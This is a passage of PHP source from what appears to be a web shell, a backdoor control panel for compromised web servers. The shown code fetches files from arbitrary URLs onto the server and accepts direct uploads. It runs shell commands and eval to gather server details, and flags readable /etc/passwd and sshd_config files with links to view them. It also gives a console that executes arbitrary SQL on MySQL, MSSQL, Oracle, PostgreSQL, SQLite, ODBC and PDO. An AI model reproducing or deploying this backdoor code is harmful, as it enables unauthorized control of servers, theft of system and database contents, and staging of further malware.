847 $fu = ss($_REQUEST['fileurl']);
848 $fn = basename($fu);
849 if(isset($_REQUEST['savefilenameurl']) && (trim($_REQUEST['savefilenameurl'])!="")) $fn = ss($_REQUEST['savefilenameurl']);
850 $fp = cp($p).$fn;
851 $st = dlfile($fu,$fp);
852 if($st) $msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=".$cwd."&view=".$fp."\">".$fp."</a></p>";
853 else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
854 }
855
856 $s_result .= $msg;
857 $s_result .= "
858 <form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\" enctype=\"multipart/form-data\">
859 <div class=\"mybox\"><h2>Upload from computer</h2>
860 <table class=\"myboxtbl\">
861 <tr><td style=\"width:100px;\">File</td><td><input type=\"file\" name=\"filepath\" class=\"inputzbut\" style=\"width:400px;margin:0;\" />
862 </td></tr>
863 <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolder\" value=\"".$cwd."\" /></td></tr>
864 <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilename\" value=\"\" /></td></tr>
865 <tr><td> </td><td>
866 <input type=\"submit\" name=\"uploadhd\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
867 </td></tr>
868 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
869 </table>
870 </div>
871 </form>
872 <form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\">
873 <div class=\"mybox\"><h2>Upload from internet</h2>
874 <table class=\"myboxtbl\">
875 <tr><td style=\"width:100px;\">File URL</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"fileurl\" value=\"\" />
876 </td></tr>
877 <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolderurl\" value=\"".$cwd."\" /></td></tr>
878 <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilenameurl\" value=\"\" /></td></tr>
879 <tr><td> </td><td>
880 <input type=\"submit\" name=\"uploadurl\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
881 </td></tr>
882 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
883 </table>
884 </div>
885 </form>
886 ";
887 } // show server information
888 elseif(isset($_REQUEST['info'])){
889 // access to compiler/interpreter
890 $s_python = check_access("python");
891 $s_perl = check_access("perl");
892 $s_ruby = check_access("ruby");
893 $s_gcc = check_access("gcc");
894 $s_java = check_access("java");
895
896 $s_result = "";
897 // server misc info
898 $s_result .= "<p class=\"rs_result\" onclick=\"toggle('info_server')\">Server Info</p>";
899 $s_result .= "<div class=\"info\" id=\"info_server\"><table>";
900
901 $s_result .= "<tr><td>php</td><td>".phpversion()."</td></tr>";
902 if($s_python) $s_result .= "<tr><td>python</td><td>".exe("python -V")."</td></tr>";
903 if($s_perl) $s_result .= "<tr><td>perl</td><td>".exe("perl -e \"print \$]\"")."</td></tr>";
904 if($s_ruby) $s_result .= "<tr><td>ruby</td><td>".exe("ruby -v")."</td></tr>";
905 if($s_gcc){
906 $gcc_version = exe("gcc --version");
907 $gcc_ver = explode("\n",$gcc_version);
908 if(count($gcc_ver)>0) $gcc_ver = $gcc_ver[0];
909 $s_result .= "<tr><td>gcc</td><td>".$gcc_ver."</td></tr>";
910 }
911 if($s_java) $s_result .= "<tr><td>java</td><td>".str_replace("\n", ", ", exe("java -version"))."</td></tr>";
912 if(is_file("/etc/passwd") && is_readable("/etc/passwd")) $s_result .= "<tr><td>/etc/passwd</td><td><a href=\"".$_SERVER['PHP_SELF']."?view=/etc/passwd\">/etc/passwd is readable</a></td></tr>";
913 if(is_file("/etc/issue") && is_readable("/etc/issue")) $s_result .= "<tr><td>/etc/issue</td><td><a href=\"".$_SERVER['PHP_SELF']."?view=/etc/issue\">/etc/issue is readable</a></td></tr>";
914 if(is_file("/etc/ssh/sshd_config") && is_readable("/etc/ssh/sshd_config")) $s_result .= "<tr><td>/etc/ssh/sshd_config</td><td><a href=\"".$_SERVER['PHP_SELF']."?view=/etc/ssh/sshd_config\">/etc/ssh/sshd_config is readable</a></td></tr>";
915
916 $s_result .= "</table></div>";
917
918 if(!$s_win){
919 // cpu info
920 if($i_buff=trim(file_get_contents("/proc/cpuinfo"))){
921 $s_result .= "<p class=\"rs_result\" onclick=\"toggle('info_cpu')\">CPU Info</p>";
922 $s_result .= "<div class=\"info\" id=\"info_cpu\">";
923 $i_buffs = explode("\n\n", $i_buff);
924 foreach($i_buffs as $i_buffss){
925 $i_buffss = trim($i_buffss);
926 if($i_buffss!=""){
927 $i_buffsss = explode("\n",$i_buffss);
928 $s_result .= "<table>";
929 foreach($i_buffsss as $i){
930 $i = trim($i);
931 if($i!=""){
932 $ii = explode(":",$i);
933 if(count($ii)==2) $s_result .= "<tr><td>".$ii[0]."</td><td>".$ii[1]."</td></tr>";
934 }
935 }
936 $s_result .= "</table>";
937 }
938 }
939 $s_result .= "</div>";
940 }
941 // mem info
942 if($i_buff=trim(file_get_contents("/proc/meminfo"))){
943 $s_result .= "<p class=\"rs_result\" onclick=\"toggle('info_mem')\">Memory Info</p>";
944 $i_buffs = explode("\n",$i_buff);
945 $s_result .= "<div class=\"info\" id=\"info_mem\"><table>";
946 foreach($i_buffs as $i){
947 $i = trim($i);
948 if($i!=""){
949 $ii = explode(":",$i);
950 if(count($ii)==2) $s_result .= "<tr><td>".$ii[0]."</td><td>".$ii[1]."</td></tr>";
951 }
952 else $s_result .= "</table><table>";
953 }
954 $s_result .= "</table></div>";
955 }
956 // partition
957 if($i_buff=trim(file_get_contents("/proc/partitions"))){
958 $i_buff = preg_replace("/\ +/"," ",$i_buff);
959 $s_result .= "<p class=\"rs_result\" onclick=\"toggle('info_part')\">Partitions Info</p>";
960 $s_result .= "<div class=\"info\" id=\"info_part\">";
961 $i_buffs = explode("\n\n", $i_buff);
962 $s_result .= "<table><tr>";
963 $i_head = explode(" ",$i_buffs[0]);
964 foreach($i_head as $h) $s_result .= "<th>".$h."</th>";
965 $s_result .= "</tr>";
966 $i_buffss = explode("\n", $i_buffs[1]);
967 foreach($i_buffss as $i_b){
968 $i_row = explode(" ",trim($i_b));
969 $s_result .= "<tr>";
970 foreach($i_row as $r) $s_result .= "<td style=\"text-align:center;\">".$r."</td>";
971 $s_result .= "</tr>";
972 }
973 $s_result .= "</table>";
974 $s_result .= "</div>";
975 }
976 }
977 $phpinfo = array(
978 "PHP General" => INFO_GENERAL,
979 "PHP Configuration" => INFO_CONFIGURATION,
980 "PHP Modules" => INFO_MODULES,
981 "PHP Environment" => INFO_ENVIRONMENT,
982 "PHP Variables" => INFO_VARIABLES
983 );
984 foreach($phpinfo as $p=>$i){
985 $s_result .= "<p class=\"rs_result\" onclick=\"toggle('".$i."')\">".$p."</p>";
986 ob_start();
987 eval("phpinfo(".$i.");");
988 $b = ob_get_contents();
989 ob_end_clean();
990 $a = strpos($b,"<body>")+6;
991 $z = strpos($b,"</body>");
992 $body = substr($b,$a,$z-$a);
993 $body = str_replace(",",", ",$body);
994 $body = str_replace(";","; ",$body);
995 $s_result .= "<div class=\"info\" id=\"".$i."\">".$body."</div>";
996 }
997 } // working with database
998 elseif(isset($_REQUEST['db'])){
999 // sqltype : mysql, mssql, oracle, pgsql, odbc, pdo
1000 $sqlhost = isset($_REQUEST['sqlhost'])? ss($_REQUEST['sqlhost']) : "localhost";
1001 $sqlport = isset($_REQUEST['sqlport'])? ss($_REQUEST['sqlport']) : "";
1002 $sqluser = isset($_REQUEST['sqluser'])? ss($_REQUEST['sqluser']) : "";
1003 $sqlpass = isset($_REQUEST['sqlpass'])? ss($_REQUEST['sqlpass']) : "";
1004 $odbcdsn = isset($_REQUEST['odbcdsn'])? ss($_REQUEST['odbcdsn']) : "";
1005 $odbcuser = isset($_REQUEST['odbcuser'])? ss($_REQUEST['odbcuser']) : "";
1006 $odbcpass = isset($_REQUEST['odbcpass'])? ss($_REQUEST['odbcpass']) : "";
1007 $pdodsn = isset($_REQUEST['pdodsn'])? ss($_REQUEST['pdodsn']) : "";
1008 $pdouser = isset($_REQUEST['pdouser'])? ss($_REQUEST['pdouser']) : "";
1009 $pdopass = isset($_REQUEST['pdopass'])? ss($_REQUEST['pdopass']) : "";
1010 $sqlite_file = isset($_REQUEST['sqlite_file'])? ss($_REQUEST['sqlite_file']) : "";
1011
1012 $sqls = "";
1013 $q_result = "";
1014 $hostandport = $sqlhost;
1015 if(trim($sqlport)!="") $hostandport = $sqlhost.":".$sqlport;
1016
1017 $sqlform_tpl = "<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
1018 <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
1019 <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
1020 <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
1021 <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
1022 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1023 <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">__sqlcode__</textarea>
1024 <p><input type=\"submit\" name=\"__sqltype__\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
1025 Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
1026 </form>";
1027
1028 if(isset($_REQUEST['mysql']) && ($con = mysql_connect($hostandport,$sqluser,$sqlpass))){
1029 if(isset($_REQUEST['sqlcode'])){
1030 $sqls = ss($_REQUEST['sqlcode']);
1031 $querys = explode(";",$sqls);
1032
1033 foreach($querys as $query){
1034 if(trim($query) != ""){
1035 $hasil = mysql_query($query);
1036 if($hasil){
1037 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1038 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1039 <table class=\"explore\" style=\"width:99%;\"><tr>";
1040 for($i=0;$i<mysql_num_fields($hasil);$i++)
1041 $q_result .= "<th>".htmlspecialchars(mysql_field_name($hasil,$i))."</th>";
1042 $q_result .= "</tr>";
1043 while($rows=mysql_fetch_array($hasil)){
1044 $q_result .= "<tr>";
1045 for($j=0;$j<mysql_num_fields($hasil);$j++)
1046 {
1047 if($rows[$j] == "") $dataz = " ";
1048 else $dataz = $rows[$j];
1049 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1050 }
1051 $q_result .= "</tr>";
1052 }
1053 $q_result .= "</table>";
1054 }
1055 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1056 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1057 }
1058 }
1059 }
1060 else $sqls = "SHOW databases;";
1061
1062 $s_result .= str_replace("__sqltype__","mysql",str_replace("__sqlcode__", $sqls, $sqlform_tpl));
1063 $s_result .= "<div>".$q_result."</div>";
1064 if($con) mysql_close($con);
1065 }
1066 elseif(isset($_REQUEST['mssql']) && ($con = mssql_connect($hostandport,$sqluser,$sqlpass))){
1067 if(isset($_REQUEST['sqlcode'])){
1068 $sqls = ss($_REQUEST['sqlcode']);
1069 $querys = explode(";",$sqls);
1070
1071 foreach($querys as $query){
1072 if(trim($query) != ""){
1073 $hasil = mssql_query($query);
1074 if($hasil){
1075 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1076 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1077 <table class=\"explore\" style=\"width:99%;\"><tr>";
1078 for($i=0;$i<mssql_num_fields($hasil);$i++)
1079 $q_result .= "<th>".htmlspecialchars(mssql_field_name($hasil,$i))."</th>";
1080 $q_result .= "</tr>";
1081 while($rows=mssql_fetch_array($hasil)){
1082 $q_result .= "<tr>";
1083 for($j=0;$j<mssql_num_fields($hasil);$j++)
1084 {
1085 if($rows[$j] == "") $dataz = " ";
1086 else $dataz = $rows[$j];
1087 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1088 }
1089 $q_result .= "</tr>";
1090 }
1091 $q_result .= "</table>";
1092 }
1093 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1094 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1095 }
1096 }
1097 }
1098 else $sqls = "SELECT name FROM master..sysdatabases;";
1099
1100 $s_result .= str_replace("__sqltype__","mssql",str_replace("__sqlcode__", $sqls, $sqlform_tpl));
1101 $s_result .= "<div>".$q_result."</div>";
1102 if($con) mssql_close($con);
1103 }
1104 elseif(isset($_REQUEST['sqlsrv']) && ($con = sqlsrv_connect($hostandport,$sqluser,$sqlpass))){
1105 if(isset($_REQUEST['sqlcode'])){
1106 $sqls = ss($_REQUEST['sqlcode']);
1107 $querys = explode(";",$sqls);
1108
1109 foreach($querys as $query){
1110 if(trim($query) != ""){
1111 $hasil = sqlsrv_query($query);
1112 if($hasil){
1113 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1114 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1115 <table class=\"explore\" style=\"width:99%;\"><tr>";
1116 for($i=0;$i<sqlsrv_num_fields($hasil);$i++)
1117 $q_result .= "<th>".htmlspecialchars(sqlsrv_field_name($hasil,$i))."</th>";
1118 $q_result .= "</tr>";
1119 while($rows=sqlsrv_fetch_array($hasil)){
1120 $q_result .= "<tr>";
1121 for($j=0;$j<sqlsrv_num_fields($hasil);$j++)
1122 {
1123 if($rows[$j] == "") $dataz = " ";
1124 else $dataz = $rows[$j];
1125 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1126 }
1127 $q_result .= "</tr>";
1128 }
1129 $q_result .= "</table>";
1130 }
1131 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1132 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1133 }
1134 }
1135 }
1136 else $sqls = "SELECT name FROM master..sysdatabases;";
1137
1138 $s_result .= str_replace("__sqltype__","sqlsrv",str_replace("__sqlcode__", $sqls, $sqlform_tpl));
1139 $s_result .= "<div>".$q_result."</div>";
1140 if($con) sqlsrv_close($con);
1141 }
1142 elseif(isset($_REQUEST['oracle']) && ($con = oci_connect($sqluser,$sqlpass,$hostandport))){
1143 if(isset($_REQUEST['sqlcode'])){
1144 $sqls = ss($_REQUEST['sqlcode']);
1145 $querys = explode(";",$sqls);
1146
1147 foreach($querys as $query){
1148 if(trim($query) != ""){
1149 $st = oci_parse($con, $query);
1150 if(oci_execute($st)){
1151 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1152 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1153 <table class=\"explore\" style=\"width:99%;\"><tr>";
1154 for($i=1;$i<=oci_num_fields($st);$i++)
1155 $q_result .= "<th>".htmlspecialchars(oci_field_name($st,$i))."</th>";
1156
1157 $q_result .= "</tr>";
1158
1159 while($rows=oci_fetch_array($st)){
1160 $q_result .= "<tr>";
1161 for($j=0;$j<oci_num_fields($st);$j++)
1162 {
1163 if($rows[$j] == "") $dataz = " ";
1164 else $dataz = $rows[$j];
1165 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1166 }
1167 $q_result .= "</tr>";
1168 }
1169 $q_result .= "</table>";
1170 }
1171 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1172 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1173 }
1174 }
1175 }
1176 else $sqls = "SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME;";
1177
1178 $s_result .= str_replace("__sqltype__","oracle",str_replace("__sqlcode__", $sqls, $sqlform_tpl));
1179 $s_result .= "<div>".$q_result."</div>";
1180 if($con) oci_close($con);
1181 }
1182 elseif(isset($_REQUEST['pgsql']) && ($con = pg_connect("host=$sqlhost user=$sqluser password=$sqlpass port=$sqlport"))){
1183 if(isset($_REQUEST['sqlcode'])){
1184 $sqls = ss($_REQUEST['sqlcode']);
1185 $querys = explode(";",$sqls);
1186
1187 foreach($querys as $query){
1188 if(trim($query) != ""){
1189 $hasil = pg_query($query);
1190 if($hasil){
1191 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1192 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1193 <table class=\"explore\" style=\"width:99%;\"><tr>";
1194 for($i=0;$i<pg_num_fields($hasil);$i++)
1195 $q_result .= "<th>".htmlspecialchars(pg_field_name($hasil,$i))."</th>";
1196 $q_result .= "</tr>";
1197
1198 while($rows=pg_fetch_array($hasil)){
1199 $q_result .= "<tr>";
1200 for($j=0;$j<pg_num_fields($hasil);$j++)
1201 {
1202 if($rows[$j] == "") $dataz = " ";
1203 else $dataz = $rows[$j];
1204 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1205 }
1206 $q_result .= "</tr>";
1207 }
1208 $q_result .= "</table>";
1209 }
1210 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1211 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1212 }
1213 }
1214 }
1215 else $sqls = "SELECT schema_name FROM information_schema.schemata;";
1216
1217 $s_result .= str_replace("__sqltype__","pgsql",str_replace("__sqlcode__", $sqls, $sqlform_tpl));
1218 $s_result .= "<div>".$q_result."</div>";
1219 if($con) pg_close($con);
1220 }
1221 elseif(isset($_REQUEST['sqlite']) && ($con = sqlite_open($sqlite_file))){
1222 if(isset($_REQUEST['sqlcode'])){
1223 $sqls = ss($_REQUEST['sqlcode']);
1224 $querys = explode(";",$sqls);
1225
1226 foreach($querys as $query){
1227 if(trim($query) != ""){
1228 $hasil = sqlite_query($con, $query);
1229 if($hasil){
1230 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1231 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1232 <table class=\"explore\" style=\"width:99%;\"><tr>";
1233 for($i=0;$i<sqlite_num_fields($hasil);$i++)
1234 $q_result .= "<th>".htmlspecialchars(sqlite_field_name($hasil,$i))."</th>";
1235 $q_result .= "</tr>";
1236
1237 while($rows=sqlite_fetch_array($hasil)){
1238 $q_result .= "<tr>";
1239 for($j=0;$j<sqlite_num_fields($hasil);$j++)
1240 {
1241 if($rows[$j] == "") $dataz = " ";
1242 else $dataz = $rows[$j];
1243 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1244 }
1245 $q_result .= "</tr>";
1246 }
1247 $q_result .= "</table>";
1248 }
1249 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1250 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1251 }
1252 }
1253 }
1254 else $sqls = "SELECT name FROM sqlite_master WHERE type='table';";
1255
1256 $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
1257 <input type=\"hidden\" name=\"sqlite_file\" value=\"".$sqlite_file."\" />
1258 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1259 <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
1260 <p><input type=\"submit\" name=\"sqlite\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
1261 Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
1262 </form>";
1263 $s_result .= "<div>".$q_result."</div>";
1264 if($con) sqlite_close($con);
1265 }
1266 elseif(isset($_REQUEST['sqlite3']) && ($con = new SQLite3($sqlite_file))){
1267 if(isset($_REQUEST['sqlcode'])){
1268 $sqls = ss($_REQUEST['sqlcode']);
1269 $querys = explode(";",$sqls);
1270
1271 foreach($querys as $query){
1272 if(trim($query) != ""){
1273 $hasil = $con->query($query);
1274 if($hasil){
1275 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1276 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1277 <table class=\"explore\" style=\"width:99%;\"><tr>";
1278 for($i=0;$i<$hasil->numColumns();$i++)
1279 $q_result .= "<th>".htmlspecialchars($hasil->columnName($i))."</th>";
1280 $q_result .= "</tr>";
1281
1282 while($rows=$hasil->fetchArray()){
1283 $q_result .= "<tr>";
1284 for($j=0;$j<$hasil->numColumns();$j++)
1285 {
1286 if($rows[$j] == "") $dataz = " ";
1287 else $dataz = $rows[$j];
1288 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1289 }
1290 $q_result .= "</tr>";
1291 }
1292 $q_result .= "</table>";
1293 }
1294 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1295 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1296 }
1297 }
1298 }
1299 else $sqls = "SELECT name FROM sqlite_master WHERE type='table';";
1300
1301 $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
1302 <input type=\"hidden\" name=\"sqlite_file\" value=\"".$sqlite_file."\" />
1303 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1304 <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
1305 <p><input type=\"submit\" name=\"sqlite3\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
1306 Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
1307 </form>";
1308 $s_result .= "<div>".$q_result."</div>";
1309 if($con) $con->close();
1310 }
1311 elseif(isset($_REQUEST['odbc']) && ($con = odbc_connect($odbcdsn,$odbcuser,$odbcpass))){
1312 if(isset($_REQUEST['sqlcode'])){
1313 $sqls = ss($_REQUEST['sqlcode']);
1314 $querys = explode(";",$sqls);
1315
1316 foreach($querys as $query){
1317 if(trim($query) != ""){
1318 $hasil = odbc_exec($con, $query);
1319 if($hasil){
1320 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1321 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1322 <table class=\"explore\" style=\"width:99%;\"><tr>";
1323 for($i=1;$i<=odbc_num_fields($hasil);$i++)
1324 $q_result .= "<th>".htmlspecialchars(odbc_field_name($hasil,$i))."</th>";
1325 $q_result .= "</tr>";
1326
1327 while($rows=odbc_fetch_array($hasil)){
1328 $q_result .= "<tr>";
1329 foreach($rows as $r)
1330 {
1331 if($r == "") $dataz = " ";
1332 else $dataz = $r;
1333 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1334 }
1335 $q_result .= "</tr>";
1336 }
1337 $q_result .= "</table>";
1338 }
1339 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1340 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1341 }
1342 }
1343 }
1344 else $sqls = "";
1345
1346 $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
1347 <input type=\"hidden\" name=\"odbcdsn\" value=\"".$odbcdsn."\" />
1348 <input type=\"hidden\" name=\"odbcuser\" value=\"".$odbcuser."\" />
1349 <input type=\"hidden\" name=\"odbcpass\" value=\"".$odbcpass."\" />
1350 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1351 <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
1352 <p><input type=\"submit\" name=\"odbc\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
1353 Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
1354 </form>";
1355 $s_result .= "<div>".$q_result."</div>";
1356 if($con) odbc_close($con);
1357 }
1358 elseif(isset($_REQUEST['pdo'])){
1359 // create object
1360 $mypdo = new PDO($pdodsn,$pdouser,$pdopass);
1361 if(isset($_REQUEST['sqlcode'])){
1362 $sqls = ss($_REQUEST['sqlcode']);
1363 $querys = explode(";",$sqls);
1364
1365 foreach($querys as $query){
1366 if(trim($query) != ""){
1367
1368 if($hasil = $mypdo->query($query)){
1369 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1370 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1371 <table class=\"explore\" style=\"width:99%;\"><tr>";
1372 // workaround to get column name
1373 $r = $hasil->fetch(2);
1374 $savefirstrow = array();
1375 foreach($r as $fn=>$fv){
1376 $q_result .= "<th>".htmlspecialchars($fn)."</th>";
1377 $savefirstrow[] = $fv;
1378 }
1379 $q_result .= "</tr><tr>";
1380 foreach($savefirstrow as $fv){
1381 $q_result .= "<td>".htmlspecialchars($fv)."</td>";
1382 }
1383 $q_result .= "</tr>";
1384 while($rows = $hasil->fetch(2)){
1385 $q_result .= "<tr>";
1386 foreach($rows as $r)
1387 {
1388 if($r == "") $dataz = " ";
1389 else $dataz = $r;
1390 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1391 }
1392 $q_result .= "</tr>";
1393 }
1394 $q_result .= "</table>";
1395 }
1396 else{
1397
1398 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1399 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1400 }
1401 $q_result .= "</table>";
1402 }
1403 }
1404 }
1405 else $sqls = "";
1406
1407 $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
1408 <input type=\"hidden\" name=\"pdodsn\" value=\"".$pdodsn."\" />
1409 <input type=\"hidden\" name=\"pdouser\" value=\"".$pdouser."\" />
1410 <input type=\"hidden\" name=\"pdopass\" value=\"".$pdopass."\" />
1411 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1412 <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
1413 <p><input type=\"submit\" name=\"pdo\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
1414 Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
1415 </form>";
1416 $s_result .= "<div>".$q_result."</div>";
1417 }
1418 else{
1419 // sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
1420 $sqllist = array();
1421 if(function_exists("mysql_connect")) $sqllist["mysql"] = "connect to MySQL <span style=\"font-size:12px;color:#999;\">- using mysql_*</span>";
1422 if(function_exists("mssql_connect")) $sqllist["mssql"] = "connect to MsSQL <span style=\"font-size:12px;color:#999;\">- using mssql_*</span>";
1423 if(function_exists("sqlsrv_connect")) $sqllist["sqlsrv"] = "connect to MsSQL <span style=\"font-size:12px;color:#999;\">- using sqlsrv_*</span>";
1424 if(function_exists("pg_connect")) $sqllist["pgsql"] = "connect to PostgreSQL <span style=\"font-size:12px;color:#999;\">- using pg_*</span>";
1425 if(function_exists("oci_connect")) $sqllist["oracle"] = "connect to oracle <span style=\"font-size:12px;color:#999;\">- using oci_*</span>";
1426 if(function_exists("sqlite_open")) $sqllist["sqlite"] = "connect to SQLite <span style=\"font-size:12px;color:#999;\">- using sqlite_*</span>";
1427 if(class_exists("SQLite3")) $sqllist["sqlite3"] = "connect to SQLite3 <span style=\"font-size:12px;color:#999;\">- using class SQLite3</span>";
1428 if(function_exists("odbc_connect")) $sqllist["odbc"] = "connect via ODBC <span style=\"font-size:12px;color:#999;\">- using odbc_*</span>";
1429 if(class_exists("PDO")) $sqllist["pdo"] = "connect via PDO <span style=\"font-size:12px;color:#999;\">- using class PDO</span>";
1430
1431 foreach($sqllist as $sqltype=>$sqltitle){
1432 if($sqltype=="odbc"){
1433 $s_result .= "<div class=\"mybox\"><h2>".$sqltitle."</h2>
1434 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1435 <table class=\"myboxtbl\">
1436 <tr><td style=\"width:170px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcdsn\" value=\"".$odbcdsn."\" /></td></tr>
1437 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcuser\" value=\"".$odbcuser."\" /></td></tr>
1438 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"odbcpass\" value=\"\" /></td></tr>
1439 </table>
1440 <input type=\"submit\" name=\"".$sqltype."\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1441 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1442 </form>
1443 </div>";
1444 }
1445 elseif($sqltype=="pdo"){
1446 $s_result .= "<div class=\"mybox\"><h2>".$sqltitle."</h2>
1447 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1448 <table class=\"myboxtbl\">
1449 <tr><td style=\"width:170px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdodsn\" value=\"".$pdodsn."\" /></td></tr>
1450 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdouser\" value=\"".$pdouser."\" /></td></tr>
1451 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"pdopass\" value=\"\" /></td></tr>
1452 </table>
